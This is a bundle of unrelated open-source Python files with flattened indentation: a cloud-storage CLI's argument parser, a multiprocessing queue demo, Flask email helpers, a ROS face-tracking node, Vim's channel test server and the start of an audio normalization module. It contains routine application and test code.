parser_download = sub_parser.add_parser("download", help="Download file from COS to local")
parser_download.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_download.add_argument('local_path', help="Local file path as /tmp/a.txt", type=str)
parser_download.add_argument('-f', '--force', help="Overwrite the saved files", action="store_true", default=False)
parser_download.add_argument('-y', '--yes', help="Skip confirmation", action="store_true", default=False)
parser_download.add_argument('-r', '--recursive', help="Download recursively when upload directory", action="store_true", default=False)
parser_download.add_argument('-s', '--sync', help="Download and skip the same file", action="store_true", default=False)
parser_download.add_argument('-H', '--headers', help="Specify HTTP headers", type=str, default='{}')
parser_download.add_argument('--versionId', help='Specify versionId of object to list', type=str, default="")
parser_download.add_argument('--include', help='Specify filter rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="*")
parser_download.add_argument('--ignore', help='Specify ignored rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="")
parser_download.add_argument('--skipmd5', help='Download sync without check md5, only check filename and filesize', action="store_true", default=False)
parser_download.add_argument('--delete', help="delete objects which exists in local but not exist in cos", action="store_true", default=False)
parser_download.add_argument('-n', '--num', help='Specify max part_num of multidownload', type=int, default=10)
parser_download.set_defaults(func=Op.download)
parser_delete = sub_parser.add_parser("delete", help="Delete file or files on COS")
parser_delete.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_delete.add_argument('-r', '--recursive', help="Delete files recursively, WARN: all files with the prefix will be deleted!", action="store_true", default=False)
parser_delete.add_argument('--versions', help='Delete objects with versions', action="store_true", default=False)
parser_delete.add_argument('--versionId', help='Specify versionId of object to list', type=str, default="")
parser_delete.add_argument('-f', '--force', help="Delete directly without confirmation", action="store_true", default=False)
parser_delete.add_argument('-y', '--yes', help="Delete directly without confirmation", action="store_true", default=False)
parser_delete.set_defaults(func=Op.delete)
parser_abort = sub_parser.add_parser("abort", help='Aborts upload parts on COS')
parser_abort.add_argument("cos_path", nargs='?', help="Cos_path as a/b.txt", type=str, default='')
parser_abort.set_defaults(func=Op.abort)
parser_copy = sub_parser.add_parser("copy", help="Copy file from COS to COS")
parser_copy.add_argument('source_path', help="Source file path as 'bucket-appid.cos.ap-guangzhou.myqcloud.com/a.txt'", type=str)
parser_copy.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_copy.add_argument('-H', '--headers', help="Specify HTTP headers", type=str, default='{}')
parser_copy.add_argument('-d', '--directive', help="if Overwrite headers", type=str, choices=['Copy', 'Replaced'], default="Copy")
parser_copy.add_argument('-s', '--sync', help="Copy and skip the same file", action="store_true", default=False)
parser_copy.add_argument('-r', '--recursive', help="Copy files recursively", action="store_true", default=False)
parser_copy.add_argument('-f', '--force', help="Overwrite file without skip", action="store_true", default=False)
parser_copy.add_argument('-y', '--yes', help="Skip confirmation", action="store_true", default=False)
parser_copy.add_argument('--include', help='Specify filter rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="*")
parser_copy.add_argument('--ignore', help='Specify ignored rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="")
parser_copy.add_argument('--skipmd5', help='Copy sync without check md5, only check filename and filesize', action="store_true", default=False)
parser_copy.add_argument('--delete', help="delete objects which exists in sourcepath but not exist in dstpath", action="store_true", default=False)
parser_copy.set_defaults(func=Op.copy)
parser_move = sub_parser.add_parser("move", help="move file from COS to COS")
parser_move.add_argument('source_path', help="Source file path as 'bucket-appid.cos.ap-guangzhou.myqcloud.com/a.txt'", type=str)
parser_move.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_move.add_argument('-H', '--headers', help="Specify HTTP headers", type=str, default='{}')
parser_move.add_argument('-d', '--directive', help="if Overwrite headers", type=str, choices=['Copy', 'Replaced'], default="Copy")
parser_move.add_argument('-r', '--recursive', help="Copy files recursively", action="store_true", default=False)
parser_move.add_argument('--include', help='Specify filter rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="*")
parser_move.add_argument('--ignore', help='Specify ignored rules, separated by commas; Example: *.txt,*.docx,*.ppt', type=str, default="")
parser_move.set_defaults(func=Op.move)
parser_list = sub_parser.add_parser("list", help='List files on COS')
parser_list.add_argument("cos_path", nargs='?', help="Cos_path as a/b.txt", type=str, default='')
parser_list.add_argument('-a', '--all', help="List all the files", action="store_true", default=False)
parser_list.add_argument('-r', '--recursive', help="List files recursively", action="store_true", default=False)
parser_list.add_argument('-n', '--num', help='Specify max num of files to list', type=int, default=100)
parser_list.add_argument('-v', '--versions', help='List object with versions', action="store_true", default=False)
parser_list.add_argument('--human', help='Humanized display', action="store_true", default=False)
parser_list.set_defaults(func=Op.list)
parser_list_parts = sub_parser.add_parser("listparts", help="List upload parts")
parser_list_parts.add_argument("cos_path", nargs='?', help="Cos_path as a/b.txt", type=str, default='')
parser_list_parts.set_defaults(func=Op.list_parts)
parser_info = sub_parser.add_parser("info", help="Get the information of file on COS")
parser_info.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_info.add_argument('--human', help='Humanized display', action="store_true", default=False)
parser_info.set_defaults(func=Op.info)
parser_restore = sub_parser.add_parser("restore", help="Restore")
parser_restore.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_restore.add_argument('-r', '--recursive', help="Restore files recursively", action="store_true", default=False)
parser_restore.add_argument('-d', '--day', help='Specify lifetime of the restored (active) copy', type=int, default=7)
parser_restore.add_argument('-t', '--tier', help='Specify the data access tier', type=str, choices=['Expedited', 'Standard', 'Bulk'], default='Standard')
parser_restore.set_defaults(func=Op.restore)
parser_signurl = sub_parser.add_parser("signurl", help="Get download url")
parser_signurl.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_signurl.add_argument('-t', '--timeout', help='Specify the signature valid time', type=int, default=10000)
parser_signurl.set_defaults(func=Op.signurl)
parser_create_bucket = sub_parser.add_parser("createbucket", help='Create bucket')
parser_create_bucket.set_defaults(func=Op.create_bucket)
parser_delete_bucket = sub_parser.add_parser("deletebucket", help='Delete bucket')
parser_delete_bucket.add_argument('-f', '--force', help="Clear all inside the bucket and delete bucket", action="store_true", default=False)
parser_delete_bucket.set_defaults(func=Op.delete_bucket)
parser_put_object_acl = sub_parser.add_parser("putobjectacl", help='''Set object acl''')
parser_put_object_acl.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_put_object_acl.add_argument('--grant-read', dest='grant_read', help='Set grant-read', type=str, required=False)
parser_put_object_acl.add_argument('--grant-write', dest='grant_write', help='Set grant-write', type=str, required=False)
parser_put_object_acl.add_argument('--grant-full-control', dest='grant_full_control', help='Set grant-full-control', type=str, required=False)
parser_put_object_acl.set_defaults(func=Op.put_object_acl)
parser_get_object_acl = sub_parser.add_parser("getobjectacl", help='Get object acl')
parser_get_object_acl.add_argument("cos_path", help="Cos_path as a/b.txt", type=str)
parser_get_object_acl.set_defaults(func=Op.get_object_acl)
parser_put_bucket_acl = sub_parser.add_parser("putbucketacl", help='''Set bucket acl''')
parser_put_bucket_acl.add_argument('--grant-read', dest='grant_read', help='Set grant-read', type=str, required=False)
parser_put_bucket_acl.add_argument('--grant-write', dest='grant_write', help='Set grant-write', type=str, required=False)
parser_put_bucket_acl.add_argument('--grant-full-control', dest='grant_full_control', help='Set grant-full-control', type=str, required=False)
parser_put_bucket_acl.set_defaults(func=Op.put_bucket_acl)
parser_get_bucket_acl = sub_parser.add_parser("getbucketacl", help='Get bucket acl')
parser_get_bucket_acl.set_defaults(func=Op.get_bucket_acl)
parser_put_bucket_versioning = sub_parser.add_parser("putbucketversioning", help="Set the versioning state")
parser_put_bucket_versioning.add_argument("status", help="Status as a/b.txt", type=str, choices=['Enabled', 'Suspended'], default='Enable')
parser_put_bucket_versioning.set_defaults(func=Op.put_bucket_versioning)
parser_get_bucket_versioning = sub_parser.add_parser("getbucketversioning", help="Get the versioning state")
parser_get_bucket_versioning.set_defaults(func=Op.get_bucket_versioning)
parser_probe = sub_parser.add_parser("probe", help="Connection test")
parser_probe.add_argument('-n', '--num', help='Specify test times', type=int, default=3)
parser_probe.add_argument('-s', '--size', help='Specify test filesize(unit MB)', type=int, default=1)
parser_probe.set_defaults(func=Op.probe)
parser.add_argument('-v', '--version', action='version', version='%(prog)s ' + Version)
args = parser.parse_args()
logger = logging.getLogger('coscmd')
logger.setLevel(logging.INFO)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
logger_qcloud_cos = logging.getLogger('qcloud_cos')
logger_qcloud_cos.setLevel(logging.WARN)
if args.debug:
logger.setLevel(logging.DEBUG)
console.setLevel(logging.DEBUG)
logger_qcloud_cos.setLevel(logging.DEBUG)
if args.silence:
logger.setLevel(logging.FATAL)
logger_qcloud_cos.setLevel(logging.FATAL)
console.setLevel(logging.INFO)
handler = RotatingFileHandler(os.path.expanduser(args.log_path), maxBytes=args.log_size*1024*1024, backupCount=args.log_backup_count)
handler.setFormatter(logging.Formatter('%(asctime)s - [%(levelname)s]: %(message)s'))
logger.addHandler(handler)
logger_qcloud_cos.addHandler(handler)
logger.addHandler(console)
logger_qcloud_cos.addHandler(console)
global pre_appid, pre_bucket, pre_region, config_path, silence
config_path = args.config_path
pre_bucket = args.bucket
pre_region = args.region
silence = args.silence
try:
pre_appid = pre_bucket.split('-')[-1]
pre_bucket = pre_bucket.rstrip(pre_appid)
pre_bucket = pre_bucket[:-1]
except Exception:
logger.warn("set bucket error")
try:
res = args.func(args)
return res
except Exception:
return 0
def main_thread():
mainthread = Thread()
mainthread.start()
thread_ = Thread(target=command_thread)
thread_.start()
import time
try:
while True:
time.sleep(1)
if thread_.is_alive() is False:
break
except KeyboardInterrupt:
mainthread.stop()
thread_.stop()
sys.exit()
def _main():
thread_ = Thread(target=main_thread)
thread_.daemon = True
thread_.start()
try:
while thread_.is_alive():
thread_.join(2)
except KeyboardInterrupt:
logger.info('exiting')
return 1
global res
return res
if __name__ == '__main__':
_main()
global res
sys.exit(res)
|
process_communication.py
|
# -*- coding: UTF8 -*-
# !/usr/bin/env python
from multiprocessing import Process, Queue
import os, time, random
# 写数据进程执行的代码:
def write(q):
print('Process to write: %s' % os.getpid())
for value in ['A', 'B', 'C']:
print('Put %s to queue...' % value)
q.put(value)
time.sleep(random.random())
# 读数据进程执行的代码:
def read(q):
print('Process to read: %s' % os.getpid())
while True:
value = q.get(True)
print('Get %s from queue.' % value)
if __name__ == '__main__':
# 父进程创建Queue,并传给各个子进程:
q = Queue()
pw = Process(target=write, args=(q,))
pr = Process(target=read, args=(q,))
# 启动子进程pw,写入:
pw.start()
# 启动子进程pr,读取:
pr.start()
# 等待pw结束:
pw.join()
# pr进程里是死循环,无法等待其结束,只能强行终止:
pr.terminate()
|
emails.py
|
# -*- coding: utf-8 -*-
"""
:author: Grey Li (李辉)
:url: http://greyli.com
:copyright: © 2018 Grey Li <withlihui@gmail.com>
:license: MIT, see LICENSE for more details.
"""
from threading import Thread
from flask import current_app, render_template
from flask_mail import Message
from albumy.extensions import mail
def _send_async_mail(app, message):
with app.app_context():
mail.send(message)
def send_mail(to, subject, template, **kwargs):
message = Message(current_app.config['ALBUMY_MAIL_SUBJECT_PREFIX'] + subject, recipients=[to])
message.body = render_template(template + '.txt', **kwargs)
message.html = render_template(template + '.html', **kwargs)
print(message.html, message.body)
app = current_app._get_current_object()
thr = Thread(target=_send_async_mail, args=[app, message])
thr.start()
return thr
def send_confirm_email(user, token, to=None):
send_mail(subject='Email Confirm', to=to or user.email, template='emails/confirm', user=user, token=token)
def send_reset_password_email(user, token):
send_mail(subject='Password Reset', to=user.email, template='emails/reset_password', user=user, token=token)
def send_change_email_email(user, token, to=None):
send_mail(subject='Change Email Confirm', to=to or user.email, template='emails/change_email', user=user, token=token)
def send_invite_email(patient_user, token, to, doctor_name):
send_mail(subject='Invitation', to=to, template='emails/invite_email', user=patient_user,
token=token, doctor_name=doctor_name)
|
vision_dlib.py
|
#!/usr/bin/env python
import json
from threading import Thread
from imutils import face_utils
import numpy as np
import cv2
from skimage import measure
from scipy import ndimage
import dlib
import rospkg
import rospy
import roslib.packages
from std_msgs.msg import String
import tf
"""Detect motion and publish point of interest to tf
"""
SET_DRAW_DENSITY = 1
SET_THINNING = 6
SET_EXPAND = 300
ROS_PATH = roslib.packages.get_pkg_dir('akagachi_demo')
CV2_PATH = "/usr/local/lib/python3.6/dist-packages/cv2/data/"
FACE_CASCADE_PATH = CV2_PATH + '/haarcascade_frontalface_alt2.xml'
PROFILE_FACE_CASCADE_PATH = CV2_PATH + '/haarcascade_profileface.xml'
EYE_CASCADE_PATH = CV2_PATH + '/haarcascade_eye.xml'
DLIB_FACE_LMS_PREDICTER_PATH = ROS_PATH + '/../face_model/shape_predictor_68_face_landmarks.dat'
try:
dlib_face_landmarks_predictor = dlib.shape_predictor(DLIB_FACE_LMS_PREDICTER_PATH)
face_cascade = cv2.CascadeClassifier(FACE_CASCADE_PATH)
PROFILE_FACE_CASCADE = cv2.CascadeClassifier(PROFILE_FACE_CASCADE_PATH)
eye_cascade = cv2.CascadeClassifier(EYE_CASCADE_PATH)
except IOError:
print('dace landmark data is nothing! lets go facemodel folder and run shell!')
class DlibFaceDetector:
'''
Ditect bu using dlib
'''
def __init__(self, compress=0.3):
self.compress = compress
self.prev = None
self.pre_pos = np.zeros(2)
def dlib_detect(self, image):
'''
detect movement.
parameters:
- input: input image. You obviously need at least 2 images to detect movement, so nothing is calculated on the very first call.
- doodle: image to overwrite results on. If none, will overwrite results on the input image. Should have same aspect ratio as input image, but can be of different size. optional.
returns:
- overlayedImage: overlays optical flow in red, translucent colored squares in areas where there was movement, and red circle for the focus point.
- point to focus on (None if there are no interesting points)
'''
detector = dlib.get_frontal_face_detector()
center_pos = (0,0)
target_face = dlib.rectangle(300, 300, 1000, 1000)
#Image handling
overlayedImage = image.copy()
gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
#gray_image = cv2.resize(gray_image, (0, 0), fx=self.compress,
# fy=self.compress, interpolation=cv2.INTER_AREA)
if self.prev is None:
# on the first call to the function. self.prev saves previous image for comparison.
self.prev = image
return overlayedImage, None
#For speeding up, cascade detect faces.
faces = face_cascade.detectMultiScale(gray_image, scaleFactor=1.1, minNeighbors=3, minSize=(100, 100))
if len(faces) < 1:
faces = PROFILE_FACE_CASCADE.detectMultiScale(gray_image, scaleFactor=1.1, minNeighbors=3, minSize=(100, 100))
# target face is just one
if len(faces) == 1:
x, y, w, h = faces[0, :]
cv2.rectangle(overlayedImage, (x, y), (x + w, y + h), (255, 0, 0), 2)
# trim the face the cascade detedted
face = dlib.rectangle(x, y, x + w, y + h)
face_img = image[y: y + h, x: x + w]
face_parts = dlib_face_landmarks_predictor(image, face).parts()
center_pos = self.get_middle_eyes(image, face_parts)
# if you need the LMS, use here
#for i in face_parts:
# cv2.circle(overlayedImage, (i.x, i.y), 3, (255, 0, 0), -1)
if center_pos is not None:
cv2.circle(overlayedImage, center_pos, 5, (36, 74, 247), -1)
self.pre_pos = center_pos
else:
center_pos = self.pre_pos
else :
center_pos = self.pre_pos
return overlayedImage, center_pos
def eye_point(self, img, parts, left=True):
'''
calicurate the center of eye images
parameters:
- img : camera raw image
- parts : the face landmarks from Dlib
- L or R : Left is True, Right is False
return
- eye_point_center : center point of the eye image
'''
if left:
eyes = [
parts[36],
min(parts[37], parts[38], key=lambda x: x.y),
max(parts[40], parts[41], key=lambda x: x.y),
parts[39],
]
else:
eyes = [
parts[42],
min(parts[43], parts[44], key=lambda x: x.y),
max(parts[46], parts[47], key=lambda x: x.y),
parts[45],
]
org_x = eyes[0].x
org_y = eyes[1].y
# for blinking, under development
#if self.is_close(org_y, eyes[2].y):
# return None
eye = img[org_y:eyes[2].y, org_x:eyes[-1].x]
_, eye = cv2.threshold(cv2.cvtColor(eye, cv2.COLOR_RGB2GRAY), 30, 255, cv2.THRESH_BINARY_INV)
eye_point_center = self.get_center(eye)
if eye_point_center is not None:
return eye_point_center[0] + org_x, eye_point_center[1] + org_y
return eye_point_center
def get_middle_eyes(self, img, parts):
'''
cariculate the point between two eyes.
'''
center_posl = self.eye_point(img, parts, True)
center_posr = self.eye_point(img, parts, False)
if (center_posl is None) or (center_posr is None):
return None
center_pos = ((center_posl[0] + center_posr[0])/2, (center_posl[1] + center_posr[1])/2)
return center_pos
def get_center(self, gray_img):
'''
cariculate the center of the input image.
'''
moments = cv2.moments(gray_img, False)
try:
return int(moments['m10'] / moments['m00']), int(moments['m01'] / moments['m00'])
except:
return None
def is_close(self, y0, y1):
'''
detect the closing eye
'''
if abs(y0 - y1) < 10:
return True
return False
def imgPoint_to_space_point(imgPoint, inv_proj, dist=1):
'''
convert point in 2d image to point in 3d space
'''
imgPoint = np.array([imgPoint[0], imgPoint[1], 1.0])
space_point = np.dot(inv_proj, imgPoint)
space_point *= dist
return (space_point[2], -space_point[0], -space_point[1])
def cameraLoop(c_width, c_height):
'''
thread to process frame retrieval.
By executing the I/O process on another thread, the whole process can be sped up.
cf: https://www.pyimagesearch.com/2015/12/21/increasing-webcam-fps-with-python-and-opencv/
'''
# newFlag: a flag to be set to True when a new frame is saved to captured_frame.
global captured_frame, newFlag
newFlag = False
print("starting video stream...")
print("press \"q\" in camera feed window to quit program")
cap = cv2.VideoCapture(0)
cap.set(3, c_width)
cap.set(4, c_height)
print("resolution is {} x {}".format(cap.get(3), cap.get(4)))
print("setresolution is {} x {}".format(c_width, c_height))
while not rospy.is_shutdown():
ret, captured_frame = cap.read()
newFlag = True
cap.release()
firstFlag = True
if __name__ == "__main__":
rospy.init_node("vision", anonymous=True)
rospack = rospkg.RosPack()
try:
camera_name = rospy.get_param("/camera_info/name")
width = rospy.get_param("/camera_info/width")
height = rospy.get_param("/camera_info/height")
distance = rospy.get_param("/camera_info/distance")
except KeyError:
print("ROS param for vision.py not found, so using default values....")
camera_name = "BSW20KM11BK"
width = 1280
height = 720
distance = 10
print("camera name:{}\theight:{}\twidth:{}".format(camera_name, height, width))
with open("{}/calibration_param/{}.json".format(rospack.get_path("akagachi_demo"), camera_name, ".json")) as fp:
params = json.load(fp)
proj = np.array(params['camera_matrix'])
print("camera projection matrix\n{}".format(proj))
inv_proj = np.linalg.inv(proj)
print("Inverse of camera projection matrix\n{}".format(inv_proj))
cameraThread = Thread(target=cameraLoop, args=(width, height))
cameraThread.daemon = True
cameraThread.start()
tfBroadcaster = tf.TransformBroadcaster()
dlib_detector = DlibFaceDetector(compress=0.2)
while not rospy.is_shutdown():
while not newFlag:
# wait until a new frame is available.
# the main thread's process should probably always be slower than the camera thread, so in theory this should be bypassed every time.
if rospy.is_shutdown():
break
rospy.sleep(0.05)
frame = captured_frame.copy()
newFlag = False
overlayedImage, center = dlib_detector.dlib_detect(frame)
if center is not None or firstFlag:
if firstFlag:
center = np.array([width/2, height/2])
point3D = imgPoint_to_space_point(center, inv_proj, distance)
tfBroadcaster.sendTransform(point3D, tf.transformations.quaternion_from_euler(0, 0, 0), rospy.Time.now(), "/focus", "/camera")
cv2.flip(overlayedImage, 0)
cv2.imshow('detection_results', overlayedImage)
input = cv2.waitKey(1) & 0xFF
if input == ord('q'):
break
firstFlag = False
cv2.destroyAllWindows()
|
test_channel.py
|
#!/usr/bin/env python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class TestingRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
print("=== socket opened ===")
while True:
try:
received = self.request.recv(4096).decode('utf-8')
except socket.error:
print("=== socket error ===")
break
except IOError:
print("=== socket closed ===")
break
if received == '':
print("=== socket closed ===")
break
print("received: {0}".format(received))
# We may receive two messages at once. Take the part up to the
# newline, which should be after the matching "]".
todo = received
while todo != '':
splitidx = todo.find('\n')
if splitidx < 0:
used = todo
todo = ''
else:
used = todo[:splitidx]
todo = todo[splitidx + 1:]
if used != received:
print("using: {0}".format(used))
try:
decoded = json.loads(used)
except ValueError:
print("json decoding failed")
decoded = [-1, '']
# Send a response if the sequence number is positive.
if decoded[0] >= 0:
if decoded[1] == 'hello!':
# simply send back a string
response = "got it"
elif decoded[1] == 'malformed1':
cmd = '["ex",":"]wrong!["ex","smi"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise it
# sometimes fails on OS X.
time.sleep(0.2)
elif decoded[1] == 'malformed2':
cmd = '"unterminated string'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise the double
# quote in the "ok" response terminates the string.
time.sleep(0.2)
elif decoded[1] == 'malformed3':
cmd = '["ex","missing ]"'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Need to wait for Vim to give up, otherwise the ]
# in the "ok" response terminates the list.
time.sleep(0.2)
elif decoded[1] == 'split':
cmd = '["ex","let '
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
time.sleep(0.01)
cmd = 'g:split = 123"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1].startswith("echo "):
# send back the argument
response = decoded[1][5:]
elif decoded[1] == 'make change':
# Send two ex commands at the same time, before
# replying to the request.
cmd = '["ex","call append(\\"$\\",\\"added1\\")"]'
cmd += '["ex","call append(\\"$\\",\\"added2\\")"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'echoerr':
cmd = '["ex","echoerr \\\"this is an error\\\""]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
# Wait a bit, so that the "ex" command is handled
# before the "ch_evalexpr() returns. Otherwise we are
# outside the try/catch when the "ex" command is
# handled.
time.sleep(0.02)
elif decoded[1] == 'bad command':
cmd = '["ex","foo bar"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'do normal':
# Send a normal command.
cmd = '["normal","G$s more\u001b"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-works':
# Send an eval request. We ignore the response.
cmd = '["expr","\\"foo\\" . 123", -1]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-special':
# Send an eval request. We ignore the response.
cmd = '["expr","\\"foo\x7f\x10\x01bar\\"", -2]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-getline':
# Send an eval request. We ignore the response.
cmd = '["expr","getline(3)", -3]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-fails':
# Send an eval request that will fail.
cmd = '["expr","xxx", -4]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-error':
# Send an eval request that works but the result can't
# be encoded.
cmd = '["expr","function(\\"tr\\")", -5]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-bad':
# Send an eval request missing the third argument.
cmd = '["expr","xxx"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'an expr':
# Send an expr request.
cmd = '["expr","setline(\\"$\\", [\\"one\\",\\"two\\",\\"three\\"])"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'call-func':
cmd = '["call","MyFunction",[1,2,3], 0]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'redraw':
cmd = '["redraw",""]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'redraw!':
cmd = '["redraw","force"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'empty-request':
cmd = '[]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'eval-result':
# Send back the last received eval result.
response = last_eval
elif decoded[1] == 'call me':
cmd = '[0,"we called you"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "ok"
elif decoded[1] == 'call me again':
cmd = '[0,"we did call you"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = ""
elif decoded[1] == 'send zero':
cmd = '[0,"zero index"]'
print("sending: {0}".format(cmd))
self.request.sendall(cmd.encode('utf-8'))
response = "sent zero"
elif decoded[1] == 'close me':
print("closing")
self.request.close()
response = ""
elif decoded[1] == 'wait a bit':
time.sleep(0.2)
response = "waited"
elif decoded[1] == '!quit!':
# we're done
self.server.shutdown()
return
elif decoded[1] == '!crash!':
# Crash!
42 / 0
else:
response = "what?"
if response == "":
print("no response")
else:
encoded = json.dumps([decoded[0], response])
print("sending: {0}".format(encoded))
self.request.sendall(encoded.encode('utf-8'))
# Negative numbers are used for "eval" responses.
elif decoded[0] < 0:
last_eval = decoded
class ThreadedTCPRequestHandler(TestingRequestHandler):
def setup(self):
self.request.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
def writePortInFile(port):
# Write the port number in Xportnr, so that the test knows it.
f = open("Xportnr", "w")
f.write("{0}".format(port))
f.close()
def main(host, port, server_class=ThreadedTCPServer):
# Wait half a second before opening the port to test waittime in ch_open().
# We do want to get the port number, get that first. We cannot open the
# socket, guess a port is free.
if len(sys.argv) >= 2 and sys.argv[1] == 'delay':
port = 13684
writePortInFile(port)
print("Wait for it...")
time.sleep(0.5)
server = server_class((host, port), ThreadedTCPRequestHandler)
ip, port = server.server_address[0:2]
# Start a thread with the server. That thread will then start a new thread
# for each connection.
server_thread = threading.Thread(target=server.serve_forever)
server_thread.start()
writePortInFile(port)
print("Listening on port {0}".format(port))
# Main thread terminates, but the server continues running
# until server.shutdown() is called.
try:
while server_thread.is_alive():
server_thread.join(1)
except (KeyboardInterrupt, SystemExit):
server.shutdown()
if __name__ == "__main__":
main("localhost", 0)
|
normalization.py
|
# Copyright 2020-2021 Jonas Schulte-Coerne and the CYSTINET-Africa project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import itertools
import math
import os
import struct
import threading
import time
import wave
import numpy
__all__ = ("normalize",)
def normalize(source, target, channel, highpass_frequency, target_level, headroom, resolution, level_smoothing, level_threshold, limiter_lookahead, show_progress):
stream, sampling_rate, length = read(path=source, channel=channel)
if highpass_frequency:
stream = highpass(stream, sampling_rate, frequency=highpass_frequency, order=2, regularization=0.0001)
stream = a_weighting(stream, sampling_rate)
stream = activity(stream, sampling_rate, smoothing_time=0.03)
stream = level(stream, sampling_rate, smoothing_time=level_smoothing, threshold=level_threshold)
stream = normalization(stream, level=target_level)
stream = limiter(stream, sampling_rate, clip=headroom, lookahead=limiter_lookahead, hold=limiter_lookahead / 2)
if show_progress:
stream = status(stream, length=length)
write(stream, sampling_rate, path=target, bits=resolution)
###################################
# The signal processing functions #
###################################
def read(path, channel):
chunk_size = 2**14
try:
import soundfile
except ImportError:
def stream():
with wave.open(str(path), "rb") as f:
number_of_channels = f.getnchannels()
if channel > number_of_channels:
raise ValueError(f"The channel {channel} does not exist in the file with {number_of_channels} channels")
bits = f.getsampwidth()
code = {2: "h", 4: "i"}[bits]
factor = 1.0 / (2 ** (8 * f.getsampwidth() - 1))
chunk = f.readframes(chunk_size)
while chunk:
number_of_frames = len(chunk) // bits
mask = f"<{number_of_frames}{code}"
yield from numpy.multiply(struct.unpack(mask, chunk)[channel-1::number_of_channels], factor)
chunk = f.readframes(chunk_size)
with wave.open(str(path), "rb") as f:
sampling_rate = float(f.getframerate())
length = f.getnframes()
return stream(), sampling_rate, length
else:
def stream():
with soundfile.SoundFile(path) as f:
chunk = f.read(chunk_size, always_2d=True)
while len(chunk):
yield from chunk[:, channel-1]
chunk = f.read(chunk_size, always_2d=True)
with soundfile.SoundFile(path) as f:
sampling_rate = float(f.samplerate)
length = f.frames
return stream(), sampling_rate, length
def _apply_iir_filter(stream, zb, za, copy_input=False):
coefficients = numpy.empty(len(zb) + len(za) - 1)
coefficients[0:len(zb)] = zb
coefficients[len(zb):] = -za[0:-1]
data_window = numpy.zeros(len(coefficients))
input_cache = data_window[0:len(zb)]
output_cache = data_window[len(zb):]
if copy_input:
for sample in stream:
input_cache[0:-1] = input_cache[1:]
input_cache[-1] = sample
filtered = numpy.dot(coefficients, data_window)
output_cache[0:-1] = output_cache[1:]
output_cache[-1] = filtered
yield sample, filtered
else:
for sample in stream:
input_cache[0:-1] = input_cache[1:]
input_cache[-1] = sample
filtered = numpy.dot(coefficients, data_window)
output_cache[0:-1] = output_cache[1:]
output_cache[-1] = filtered
yield filtered
def highpass(stream, sampling_rate, frequency, order, regularization):
# compute the filter coefficients for a time-continuous Butterworth filter
k = 1 / (2 * math.pi * frequency)
if order == 1:
a = (k, 1)
elif order == 2:
a = (k**2, 2 * k * math.cos(math.pi / 4), 1)
else:
raise ValueError("Filter orders higher than two are not supported.")
order = len(a) - 1
b = (1,) + (0,) * order
